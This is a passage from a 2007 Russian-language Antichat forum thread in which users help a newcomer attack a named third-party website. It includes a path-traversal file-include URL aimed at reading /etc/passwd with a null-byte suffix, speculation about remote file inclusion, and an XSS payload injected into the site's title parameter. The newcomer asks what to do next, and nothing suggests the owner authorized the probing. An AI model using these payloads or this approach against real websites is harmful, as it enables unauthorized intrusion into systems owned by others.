ANTICHAT - Xss?

Страница 2 из 4

ANTICHAT (https://forum.antichat.xyz/index.php)

- Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)

- - Xss? (https://forum.antichat.xyz/showthread.php?t=56009)

159932

17.12.2007 17:04

зачем ещё !?!? мине хоть бы с этим разобраться

NOmeR1

17.12.2007 17:07

Include, Xss. Всё, что тебе нужно, ты сможешь сделать с сайтом, если конечно права есть и фильтрации нет.

scrat

17.12.2007 17:07

попробуй:

Код:

http://site.ru/nw/tmp.php?url=../../../../../../../../../etc/passwd%00&title=privet

NOmeR1

17.12.2007 17:10

Цитата:

Сообщение от scrat

попробуй:

Код:

http://site.ru/nw/tmp.php?url=../../../../../../../../../etc/passwd%00&title=privet

Ну нахрен ему /etc/passwd? Он инклюд только первый раз видит. Тем более там ноль байтов не нужно.

159932

17.12.2007 17:13

/etc/passwd не выводит ... а такой инклуд да я первый раз вижу ... я по скулю лучше

Spyder

17.12.2007 17:13

там помойму ремоут инклуд =\

Spyder

17.12.2007 17:14

ссылку дай лучше

159932

17.12.2007 17:36

http://www.megaopt.spb.ru/nw/tmp.php?url=news.htm&title=1444

freddi

17.12.2007 17:47

http://www.megaopt.spb.ru/nw/tmp.php?url=news.htm&title=<img src=javascript:alert()>

159932

17.12.2007 18:03

Цитата:

http://www.megaopt.spb.ru/nw/tmp.php?url=news.htm&title=<img src=javascript:alert()>

это я и сам обнаружил - но я всё никак понять не могу что дальше ???

Время: 17:27

Страница 2 из 4